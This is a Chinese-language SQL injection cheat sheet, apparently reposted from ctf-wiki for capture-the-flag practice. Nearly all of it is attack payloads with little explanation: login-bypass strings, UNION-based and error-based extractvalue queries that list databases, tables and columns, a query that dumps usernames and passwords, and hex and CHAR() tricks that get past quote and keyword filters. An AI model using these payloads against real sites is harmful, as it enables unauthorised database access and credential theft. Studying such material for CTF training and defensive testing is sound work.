部分转载ctf-wiki
判闭合形式:
哪个报错就是哪种
1,1’,1’‘,1’±,1’'±(双引号带括号)
万能密码:
admin’ –
admin’ #
admin’/*
’ or 1=1–
’ or 1=1#
’ or 1=1/*
') or ‘1’='1–
') or (‘1’='1–
数据库名:
- SELECT database();
- SELECT schema_name FROM
information_schema.schemata; - extractvalue(1,concat(0x7e,database(),0x7e))
表名
union
数据库中的表:
–MySQL 4版本时用version=9,MySQL 5版本时用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE
version=10;用户自定义的表 UNION SELECT TABLE_NAME FROM information_schema.tables WHERE
TABLE_SCHEMA=database();
报错
- ExtractValue(1,CONCAT(0x5c,(SELECT table_name FROM
information_schema.tables where table_schema=??)));
列名
union
- UNION SELECT GROUP_CONCAT(column_name) FROM
information_schema.columns WHERE table_name = ‘tablename’
报错
- ExtractValue(1,concat(0x7e,(SELECT(GROUP_CONCAT(column_name))FROM(information_schema.columns)WHERE(table_name)like(‘tablename’))))
根据列名查询所在表
- 查询字段名为 username 的表
SELECT table_name FROM information_schema.columns WHERE column_name = ‘username’; - 查询字段名中包含 username 的表
SELECT table_name FROM information_schema.columns WHERE column_name LIKE ‘%user%’;
查数据
union
- -1’ union select 1,2,group_concat(concat_ws(username,password)) from l0ve1ysq1#
报错
- extractvalue(1,concat(0x7e,(select(group_concat(concat_ws(username,right(password,20))))from(tablename))))
绕过引号限制
- – hex 编码
SELECT * FROM Users WHERE username = 0x61646D696E - – char() 函数
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
绕过字符串黑名单
- SELECT ‘a’ ‘d’ ‘mi’ ‘n’;
- SELECT CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
- SELECT CONCAT_WS(‘’, ‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
- SELECT GROUP_CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);